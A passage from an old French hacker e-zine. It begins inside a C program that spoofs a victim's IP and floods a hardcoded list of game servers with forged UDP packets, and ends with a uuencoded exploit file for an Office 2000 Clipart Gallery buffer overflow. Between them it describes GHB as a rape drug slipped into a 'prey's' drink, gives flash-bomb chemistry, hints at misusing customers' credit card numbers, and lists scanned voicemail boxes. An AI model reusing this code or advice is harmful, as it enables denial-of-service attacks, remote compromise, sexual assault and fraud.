"132.230.153.50:26000:0", "206.251.130.20:26000:0", "195.238.2.30:26000:0", "193.164.183.3:26000:0", "150.156.210.232:26000:0", "193.13.231.151:26000:0", "200.18.178.7:26000:0", "206.20.111.7:26000:0", "192.89.182.26:26000:0", "207.53.96.12:26000:0", "194.64.176.5:26000:0", "203.19.214.28:26000:0", "130.241.142.10:26000:0", "207.48.50.10:26000:0", "129.13.209.22:26000:0", "194.243.65.2:26000:0", "194.19.128.13:26000:0", "202.27.184.4:26000:0", "194.204.5.25:26000:0", "200.241.93.2:26000:0", "194.125.148.2:26000:0", "130.237.233.111:26000:0", "139.174.248.165:26000:0", "207.78.244.40:26000:0", "195.74.0.69:26000:0", "203.55.240.1:26000:0", "203.61.156.162:26000:0", "203.61.156.164:26000:0", "195.90.193.138:26000:0", "195.94.179.5:26000:0", "203.23.237.110:26000:0", "200.18.178.14:26000:0", "200.248.241.1:26000:0", "203.17.103.34:26000:0", "131.151.52.105:26000:0", "200.250.234.39:26000:0", "203.29.160.21:26000:0", "206.41.136.94:26000:0", "202.49.244.17:26000:0", "196.25.1.132:26000:0", "206.230.102.9:26000:0", "206.25.117.125:26000:0", "200.246.5.28:26000:0", "200.255.96.24:26000:0", "195.94.179.25:26000:0", "195.224.47.44:26000:0", "200.248.241.2:26000:0", "203.15.24.46:26000:0", "199.217.218.7:26000:0", "200.246.248.9:26000:0", "200.246.227.44:26000:0", "202.188.101.246:26000:0", "207.212.176.26:26000:0", "200.255.218.41:26000:0", "200.246.0.248:26000:0", "209.29.65.3:26000:0", "203.32.8.197:26000:0", "200.248.149.31:26000:0", "200.246.52.4:26000:0", "203.17.23.13:26000:0", "206.196.57.130:26001:0", "130.63.74.16:26000:0", "203.16.135.34:26000:0", "195.66.200.101:26000:0", "199.217.218.007:26000:0", "203.30.239.5:26000:0", "128.206.92.47:26000:0", "203.17.23.9:26000:0", "205.139.59.121:26000:0", "136.159.102.88:26000:0", "207.152.95.9:26000:0", "205.197.242.62:26000:0", "204.119.24.237:26000:0", "200.246.163.6:26000:0", "206.96.251.44:26000:0", "203.61.156.165:26000:0", "207.0.129.183:26000:0", "194.117.157.74:26000:0", "206.83.174.10:26000:0", "204.171.44.26:26000:0", "204.216.27.8:26000:0", "148.217.2.200:26000:0", "193.13.231.149:26000:0", "204.157.39.7:26000:0", "208.194.67.16:26012:0", "137.123.210.80:26000:0", "149.106.37.197:26000:0", "207.207.248.20:26000:0", "143.195.150.40:26000:0", "204.90.102.49:26000:0", "209.48.89.1:26000:0", "130.126.195.94:26000:0", "134.193.111.241:26500:0", "205.218.60.98:26001:0", "205.218.60.98:26000:0", "165.91.20.158:26000:0", "206.248.16.16:26001:0", "206.248.16.16:26002:0", "149.156.159.100:26000:0", "163.1.138.204:26000:0", "204.177.71.250:26000:0", "207.25.220.40:26000:0", "206.25.206.10:26000:0", "206.186.72.103:26000:0", "206.154.216.100:26000:0", "204.253.208.225:26000:0", "203.59.24.229:26000:0", "200.255.216.11:26000:0", "128.143.244.38:26000:0", "128.113.161.123:26000:0", "128.138.149.62:26000:0", "128.175.46.96:26000:0", "204.210.15.62:26000:0", "204.210.15.62:26001:0", "206.83.174.9:26000:0", NULL }; int i, s, fl, ret; unsigned int sp, dp; struct in_addr src, dst; struct sockaddr_in addr; char pack[1024]; struct ip *iph; struct udphdr *udph; int read_data(void); int parse_in(char *); int addserv(char *, unsigned int, char); void main(int argc, char *argv[]) { iph = (struct ip *)pack; udph = (struct udphdr *)(iph + 1); if (argc < 2) { printf("Usage: ./smack \n", argv[0]); exit(-1); } printf("Slinging Packets.....\n"); src.s_addr = inet_addr(argv[1]); if (src.s_addr == -1) { printf("Invalid source IP: %s\n", argv[1]); exit(-1); } s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (s == -1) { perror("socket"); exit(-1); } fl = 1; ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, &fl, sizeof(int)); if (ret == -1) { perror("setsockopt"); exit(-1); } bzero((char *)&addr, sizeof(addr)); addr.sin_family = AF_INET; read_data(); printf("UnFed.\n"); } int parse_in(char *in) { int i, n, c, m, ret; char ip[16], tmp[6], mode, tmp2; unsigned int port; bzero(ip, 16); bzero(tmp, 6); mode = 0; port = 0; n = 0; c = 0; m = 0; tmp2 = 0; for (i = 0; i < strlen(in); i++) { if (in[i] != ' ') { if (in[i] != ':') { if (m == 0) { ip[c] = in[i]; c++; } if (m == 1) { tmp[c] = in[i]; c++; } if (m == 2) { tmp2 = in[i]; break; } } else { m++; c = 0; } } } port = (unsigned int)atoi(tmp); mode = (tmp2 - 48); addserv(ip, port, mode); return ret; } int read_data(void) { int i; char in[1024]; for (i = 0; i < 32767; i++) { if (servers[i] == NULL) break; parse_in(servers[i]); } return 1; } int addserv(char *ip, unsigned int port, char mode) { bzero(pack, 1024); dp = port; iph->ip_v = IPVERSION; iph->ip_hl = sizeof *iph >> 2; iph->ip_tos = 0; iph->ip_ttl = 40; #ifdef BSD if (mode == 0) iph->ip_len = PS0; else iph->ip_len = PS1; #else if (mode == 0) iph->ip_len = htons(PS0); else iph->ip_len = htons(PS1); #endif iph->ip_p = IPPROTO_UDP; iph->ip_src = src; dst.s_addr = inet_addr(ip); if (dst.s_addr == -1) { printf("Invalid destination IP: %s\n", ip); } addr.sin_port = htons(port); addr.sin_addr.s_addr = dst.s_addr; iph->ip_dst = dst; #ifdef BSD udph->uh_dport = htons(dp); if (mode == 0) { udph->uh_ulen = htons(sizeof *udph + 12); udph->uh_sport = htons(rand()); } else { udph->uh_ulen = htons(sizeof *udph + strlen(conn_pack1)); udph->uh_sport = htons(27001); } #else udph->dest = htons(dp); if (mode == 0) { udph->len = htons(sizeof *udph + 12); udph->source = htons(rand()); } else { udph->len = htons(sizeof *udph + strlen(conn_pack1)); udph->source = htons(27001); } #endif if (mode == 0) { memcpy(udph + 1, conn_pack0, 12); ret = sendto(s, pack, PS0, 0, (struct sockaddr *)&addr, sizeof(addr)); } else { memcpy(udph + 1, conn_pack1, strlen(conn_pack1)); ret = sendto(s, pack, PS1, 0, (struct sockaddr *)&addr, sizeof(addr)); } if (ret == -1) { perror("sendto"); exit(-1); } } 9. Le GHB : la drogue des violeurs... ************************************* <<>> Attention : la fabrication d'un tel produit est totalemnt illegale !!! <<>> <<>> Je ne suis en aucun cas responsable de vos actes suite à la lecture de cet aricle. <<>> Le GHB ou Gamma-Hydro-Butyrolactone est né en France et a ete synthetise pour la premiere fois en 1929.Son utilisation medicale a ete promue par le professeur Henry Laborit en 1960.Pendant 20 ans il n'a eu que des applications medicales.A partir des 80's,les culturistes americains s'en servent comme stimulant de croissance,alternative aux steroïdes.Mais sa commercialisation est interdite,decision fondee sur des tests menes depuis 1990. Le GHB est aussi connu sous le nom d' "ecstasy liquide",d' "easy lay"(baise facile) ,de "scoop" ou de "soap".Il se presente sous la forme d'une poudre ou d'un liquide inodore,incolore a gout dicret.C'est une drogue de synthes avant tout utlisee de maniere "recreative" pour soi-même comme l'ecstasy,le LSD ou les amphets.On en trouve +- 500 balles (12,5 €uros,13 $)la dose dans les raves où il est souvent consomme avec de l'ecstasy.Les effets à petite dose sont proches de ceux de l'alcool : euphorie,idees rapides,legerete,... et agissent rapidement (de 15 à 30 min. apres l'avoir pris) l'intensite maximale se situe +- 1 heure apres l'avoir pris. Apres 2 à 4 heures,la drogue est totalement assimilee par l'organisme et les effets ne se font plus sentir.Le danger (et oui,y'a un danger...) reside dans le dosage : une augmentation d'un gramme peut totalement changer les effets.Les dangers d'une surdose sont les convulsions et le coma.Sans compter qu'il presente le danger de toute drogue de synthese : être toxique si il est mal realise.(C'est pour ca que si vous voulez le faire je decline toute responsabilite et surtout je vous conseille d'agir avec la plus grande prudence...) Au delà de son aspect "recreatif" , la particularite du GHB est de faire partie,avec le Rohypnol et la Ketamine de ce qu'on appelle les drogues des violeurs.La Ketamine est un anesthesique utilise par les veterinaires et le Rohypnol est un benzodiazepine vendu uniquement sur ordonnance. Un peu de cuisson,2 ou 3 melanges et le tour est joue.La drogue,incolore et inodore,n'a plus qu'à être discretement verse dans le verre de la "proie" pour la mettre K.O. quelques heures et profiter d'elle...si le melange est bien fait !! Sinon..GROS DANGER !!! Voici la recette : <<>> Attention : la fabrication d'un tel produit est totalemnt illegale !!! <<>> <<>> Je ne suis en aucun cas responsable de vos actes suite à la lecture de cet aricle. <<>> [Cette partie de l'article (la recette) a ete supprimmee pour la version du zine distribuee sur madchat. Afin de lire la version originale de ce zine, rendez vous sur le site du BHZ : http://www.thebhz.org - http://www.bhz.be.tf] <<>> Attention : la fabrication d'un tel produit est totalemnt illegale !!! <<>> <<>> Je ne suis en aucun cas responsable de vos actes suite à la lecture de cet aricle. <<>> 10.Fabrication d'une bombe aveuglante ************************************* <<>> Attention : l'utilisation d'un tel produit est totalemnt illegale !!! <<>> <<>> Je ne suis en aucun cas responsable de vos actes suite à la lecture de cet aricle. <<>> [cette partie de l'article (le mode d'emploi de la fabrication de la bombe aveuglante) a ete supprimmee du zine pour la version distribuee sur madchat. Afin de lire la version originale de ce zine, rendez vous sur le site du BHZ : http://www.thebhz.org - http://www.bhz.be.tf] <<>>Attention<<>> Le peroxyde de sodium est un oxidant puissant,specialement quand il est humide.Assurez-vous que toutes les surfaces soient bien seches.Evitez le contact avec la peu,evitez de regarder directement le tas quand la reaction demarre pour ne pas vous abîmer les yeux.<<>> Equations chimiques correspondant aux reactions: Na2O2(s) + 2H2O(l) ---> 2NaOH(aq) + H2O2(aq) (1) 2Al(s) + 3H2O2(aq) ---> Al2O3(s) + 3H2O(g) (2) 4Al(s) + 3O2(g) ---> 2Al2O3(s) (3) La reaction (1) produit du peroxyde d'hydrogene qui,en solution basique oxyde rapidement l'aluminium ; cette recation , fortement exothermique (qui degage de l'energie), porte l'exces d'aluminium à une temperature suffisante pour qu'il s'enflamme à l'air. Transformations d'energie impliquees: Energie chimique --> energie thermique --> energie lumineuse A vous de voir les differentes utilisations possibles... Personnelement c'est dans un but purement scientifique... ;-)) <<>> Attention : l'utilisation d'un tel produit est totalemnt illegale !!! <<>> <<>> Je ne suis en aucun cas responsable de vos actes suite à la lecture de cet aricle. <<>> 11.Les differentes facons de se faire de l'argent legalement sur le net *********************************************************************** Bon,dans cet articles,je vais presenter les differentes methodes et citer des exemples.J'avais au depart prevu de mettre ca sur le site mais bon.... j'ai finalement decide d'inclure ca dans le zine. -Les bannieres de pub Le principe est le suivant : vous possedez un site web avec un trafic plus ou moins dense et vous vous dites qu'il y a dans vos visiteurs des acheteurs ou clients potentiels de diverses societes.Et c'est là que revient LA Question : comment se faire des $$$-thunes-$$$ ? Ben c tout bete : il y a des societes qui vous demandent d'afficher une banniere de leurs afficheurs sur votre site et vous etes remunere soit au clic soit vous avez un pourcentage par rapport à ce que votre visiteur achete.Personnelement je ne pense pas que ce soit la meilleure facon de gagner vraiment beaucoup d'argent parce qu'à mon avis si des gens vont sur votre site c pour le site,pas pour les pubs mais bon il y a parfois des pubs accrocheuses et des annoceurs qui ciblent leur pub selon le client et là il y a plus de chances que ca marche. Les principaux sites sont : -www.ibazar.fr qui remunere par clic sur la banniere -les autres quer je ne connais pas -Les programmes de pub Avant tout je tiens à dire qu'il y a un desavantage majeur avec tous ces programmes : aucun n'est compatible avec Linux...(en tout cas moi,j'en ai pas trouve) Alors si vous voulez les utiliser,faites comme moi : il suffit d'une petite partition Win et d'aller sur Internet avec car si vous avez beaucoup de filleuls,ce seront eux votre principale source de revenus,pas vous! (Ou comment se faire des thunes sans se connecter trop...)Petite explication : Tous ces systemes sont bases sur des sortes de hierarchies parrain/filleul : si vous vous inscrivez vous pouvez specifier un parrain ou non.Si vous etes parrain,vous recevez un pourcentage des gains de vos filleuls,de vos petits-filleuls,etc.... Et l'argent ? Et ben c simple : vous telechargez le prog dispo sur le site et une fois installe vous le lancez : y'a une petite fenetre avec des pubs qui s'affichent sur votre ecran.Vous etes paye selon le nombre de pubs vues donc selon la duree de vos connexions mensuelles. Les principaux sites sont : -www.mediabarre.com ils remunerent à la fin de chaque mois à partir de 100 FF.18 francs belges par heure. 25 % des gains des filleuls,10 % des gains des petits-filleuls,etc.... -www.winbe.fr ils remunerent à la fin de chaque mois à partir de 100 FF.18 francs belges par heure. -www.getpaid4.com -www.alladvantage.com -www.gotoworld.com Ces 3-là sont en anglais et marchent aussi en Belgique. -Creer un site porno Là c'est un peu plus long mais ca peut rapporter tres gros tout en restant toujours parfaitement legal.C'est pas complique : il faut aller enregistrer un nom de domaine (le moins cher possible MAIS avec quelques Mo pour stocker les photos...) Ensuite,il faut aller chercher sur le net des photos qu'on classera en differentes categories. On peut aussi s'abonner à d'autres sites pornos dejà existants histoire de leur pomper toutes leur photos.... De toute facon,y'a pas mal de sites gratuits.... Et si vous faites le calcul : par exemple vous vous abonnez à un site et ca coute 10$ par mois. Si vous proposez la même chose sur votre site pour 3$ par mois,il vous suffira d'avoir 3,3 visiteurs pour avoir dejà rentabilise.Et comme l'abonnement à votre site sera moins cher,c'est là que tous les obsedes iront.Même si au depart il faut investir un petit peu (Internic,etc...) On peut tres vite regagner beaucoup plus et sans trop se crever. Pour s'assurer d'avoir un trafic important et un nombre de membres assez eleve,inscrivez-vous dans tous les moteurs de recherche que vous connaissez. Francite par exemple referencie dans plein d'autres moteurs de recherche francocphones.Laissez aussi des messages dans tous les forums et newsgroups que vous connaissez,qu'ils soient ou non consacres à ce sujet. Y'a aussi un autre moyen d'exploiter votre site porno : les n° de carte de credit que vous avez sont tous evidemment valides....A vous de voir ce qu'on peut faire avec ca... Mais attention ici on sombre dans l'illegalite,domaine qu'aucun de nous,j'en suis sûr.. ;-) ,n'affectionne ... 12.Scan de numeros verts ************************ Voilà le resultat d'un petit scan de numeros verts MANUEL (et oui,moi j'utilise pas des programmes à la con parce que de toute facon la plupart ne marchent pas...) J'ai scanne la zone 0800190xx et 0800191xx donc 200 numeros.Sur ces 200 numeros il y avait VMB 0800 19006 : VMB Smart Corporate One USA 0800 19022 : VMB Dialogic Sales Departement 0800 19032 : VMB Voice Comm international service 0800 19035 : VMB 18 Assistance 0800 19052 : VMB Salarated investors voice mail system 0800 19065 : VMB Daltel voice information processing 0800 19082 : VMB Home Maverick Cinelen 0800 19085 : VMB Princes Cruises 0800 19091 : VMB International Industries customer service 0800 19097 : VMB Voice Comm international service (comme le 0800 19032) 0800 19126 : VMB Northcall networks account payable 0800 19132 : VMB Korea Telecom <-Attention-> Tous les msg et les instructions sont en coreen ! 0800 19152 : VMB Ahash ici on peut aussi utiliser des commandes vocales... 0800 19173 : VMB Ansea Worldcomm switch message center 0800 19189 : VMB Edac Lavatories voice mail system 0800 19193 : VMB Situation Net voice mail Je scannerai sans doute le reste ou du moins une partie de la zone 080019xxx et je mettrai le resultat dans BHZ mag n0 5 13.Clipart Gallery overflow *************************** Application : MiKro$oft 0ffice 2OOO Grace à cet exploit, on peut prendre le controle d'un ordi qui est sous Win 95, 98, 2000 ou NT via n'importe quel code source HTML y compris les pages HTML de Outlook... Microsoft à publie un patch mais peu de personnes l'ont telecharge.... Explication : Clipart gallery (CAG.EXE) qui est compris dans Office 2000 utilise les fichiers .CIL pour l'installation de clipart provenant d'internet.Le format .CIL n'est pas bien manipule par le programme et un des champs interieurs du fichier permet de provoquer un buffer overflow, permettant à un code arbitraire d'être execute par un hacker. Le hacker n'a qu'à mettre le fichier .CIL en question dans une page HTML ou un email, ce qui provoquerait le fait que la cible importe le fichier CIL.Le fichier sera ouvert sans besoin de confirmation etant donne que ce type de fichier n'en necessite pas.Aucun des parametre de securite d'Internet Explorer n'empeche le rapatriement automatique des fichiers .CIL. Description: Le format ".CIL" est un clipart compresse qui urilise un Windows Metafile (WMF) ou tout autre type d'image, le compresse et le stocke avec des mots-cles et des descriptions. Parmi les nombreux champs dans le format .CIL, il y a des champs Unicode, c'est dans un de ceux-là qu'il y a le nom du fichier où le clipart doit être decompresse. Si le nom est extremement long, il y a un stack overflow du à la conversion de Unicode vers ANSI. De toute facon,le patch, qui ne sert pas à grand chose, prouve que comme Internet Explorer est utilise tres souvent et que son filtre permet le telechargement de tous types de fichiers. Ce qui peut faire penser que ce n'est pas le premier exploit de ce type.... le patch : http://www.microsoft.com/technet/security/bulletin/ms00-015.asp Solution rapide : Il fausrait aller verifier dans les associations de fichierset pour le type de fichier,cocher la case "confirmer avant ouverture". Exploit : Le fichier CIL va creer une cle dans la base de registre,qui ne causera aucun degat.... la location de la cle est : HKLM\Software\Microsoft\Windows:dword,SMACK!=0x00000001 Voici la source du fichier. Ce code marche seulement sous Windoze 2000 mais on peut facilement l'adapter à d'autres OS.... <-- couper ici --> begin 644 nt5.cil M4P!0`$P`20!4`$,`20!,`#,```"T$```U\W&F@``XO_B__H+^@M>`@````!/ M50$`"0```T\(```#`#P!``````4````,`ML+VPL%````"P(`````!`````4! M`0`$````!`$-``0````&`0$`!`````(!`@`%`````0+___\`!````"X!&``( M````^@(`````````````!````"T!```%`````0+___\`!P```/P"```````` M```$````+0$!``@```#Z`@```0`!```````$````+0$"``0```#P`0``.`$` M`"0#F@"=`H@!:@./`8@#AP&]`ZP!M`.2`:L#D@&/`W(!8P-^`;D"70'P`C@! M3@,``;$#T0`7!*@`@`2(`.L$<`!7!6$`Q059`.`%60#_!5D`_P4``(T%`P`= M!0X`K@0B`$$$/@#6`V$`;@.-``H#P`"J`OH`3@([`?@!@P&G`=$!7`$F`A`T<%\@-I!04$B04>!+8%&P3'!1T$U@4F!.`%X`7@!>`% MOP/3!;\#MP7&`Y0%VP.*!>,#!?L$&P7K!`X%R`3Z!+L$\`2>!,@$=@1_!%8$3`0L!"$$*@0#!"$$W@/> M`T,#U`,F`\(#Y0*Y`XD"X`-K`NP#60(*!'$"(`1E`EX$8`),!7\"3@6*`D$% MD0*#!'\"7@1@`B$$90):!*`"4`6G`F4%FP)L!7\"X`6'`N`%_P$J!)4!#@1O M`14$6P&S`V0!OP.'`;H#CP&T`Y(!O0.L`;\#GP'9`Z,!&`3F`04$\@'U`^$! MY`/6``%X`6_`],%OP.W!<8#E`7;`XH%XP-S M!>P#7`4$!$T%'00\!3<$,`66!"4%K`0M!=T$-07L!$\%^@1?!1T%;`5!!7`% M405>!4L%505(!4`%1`4W!3L%+@4S!1@%+@4+!1X%^P0;!>L$#@7(!/H$NP3P M!)X$R`1V!'\$5@1,!"P$(00J!`,$(03>`]X#0P/4`R8#P@/E`KD#B0+@`VL" M[`-9`@H$<0(@!&4"7@1@`DP%?P).!8H"0061`H,$?P)>!&`"(01E`EH$H`)0 M!:<"906;`FP%?P+@!8<"X`7_`2H$E0$.!&\!%01;`;,#9`&_`XG`P@'X0/W M!B($]P9L!/<&L`3P!LP$YP;J!-P&#`7.!A$%Q`8`%:`?@!5H'R@5L!Y8%E``Z8'3@.L!]4"IP>S`J,'J0+'!ZL"S`?%`J<'LP*L!]4"T`?T`N('YP+@ M!Z`"G`BS`NP(N0+G"*`"D0B=`MD'=`+`!WH"F@=U`HH'7P)^!U`"6P=!`B\' M0@(8!RP"[@8\`O\%!`+_!8D""````/H"```(``@```````0````M`0``!``` M`/`!`@".````)0-%`/\%B0+1!J("W`;'`O0&V0(^!_,".P<-`Q@'IP,(!^$# M]P8B!/<&;`3W!K`$\`;,!.<&Z@3@8K!8@&"@6%!NX$C`;&!(\&DP2%!FH$?`8O!&<& M#01L!@`$;`;L`TP&Q@/_!;X#_P7@!6@'X`5:!\H%;`>6!90')`6C!\`$N@<6 M!+D'W@.F!TX#K`?5`J<'LP*C!ZD"QP>K`LP'Q0*G![,"K`?5`M`']`+B!^<" MX`>@`IP(LP+L"+D"YPB@`I$(G0+9!W0"P`=Z`IH'=0**!U\"?@=0`EL'00(O M!T("&`!A0`30!,@+#075"WT%V@O\!8X+_`6."^`%B@N(!7X+&P5I"[`$3`M&!"<+WP/Z M"GL#Q@H:`XL*O@))"F8"``H5`K()R`%="8(!!`E#`:8("@%$"-D`W@>P`'8' MC@`,!W0`H`9C`#(&6@#_!5D`"````/H"```(``@```````0````M`0``!``` M`/`!`@!@````)0,N`/\%60#_!0``;@8&`-X&%`!-!RH`N0=(`",(;@"*")P` M[0C1`$P)#@&F"5(!^PF<`4H*[`&3"D$"U0J<`A$+_`)%"V`#<@O'`Y<+,02T M"YX$R`L-!=4+?07:"_P%C@O\!8X+X`6*"X@%?@L;!6D+L`1,"T8$)PO?`_H* M>P/&"AH#BPJ^`DD*9@(`"A4"L@G(`5T)@@$$"4,!I@@*`40(V0#>![``=@>. M``P'=`"@!F,`,@9:`/\%60`(````^@(```$``0``````!````"T!`@`$```` M\`$``(P````D`T0`;P?\!?\%_`7_!90+\064"_$%V@LG!MH+EP;1"P8'P`MT M!Z<+X`>&"TD(70NN""P+$`GT"FT)M0K%"6\*&`HC"F4*T0FL"GD)[`H<"24+ MNPA6"U8(@`OM!Z(+@@>\"Q4'S@NE!M<+-0;:"_P%C@O\!8X+'@:&"XP&=POY M!E\+8P<_"\P'%PLR".@*E0BQ"O0("8P'GPE^ M!XP)>0<="7X'#0EZ!_,(?@??"($'D@B(!R<(A@?=!VL'-0=U!^,&<@>A!F@' M6`9W!R(&>0&"TD(70NN""P+$`GT"FT)M0K%"6\*&`HC"F4*T0FL"GD)[`H<"24+NPA6 M"U8(@`OM!Z(+@@>\"Q4'S@NE!M<+-0;:"_P%C@O\!8X+'@:&"XP&=POY!E\+ M8P<_"\P'%PLR".@*E0BQ"O0("8P'GPE^!XP) M>0<="7X'#0EZ!_,(?@??"($'D@B(!R<(A@?=!VL'-0=U!^,&<@>A!F@'6`9W M!R(&>0 ******************************************************************************************************************************************************************************** Et oui,dejà la fin de ce zine qui a mis plus de temps que ses predecesseurs à sortir,parce que cette fois-ci j'ai voulu faire quelque chose de mieux, j'espere que ca plaira. Si vous voulez ecrire des articles pour BHZ Mag, envoyez-moi un email : asmodeus@mail.be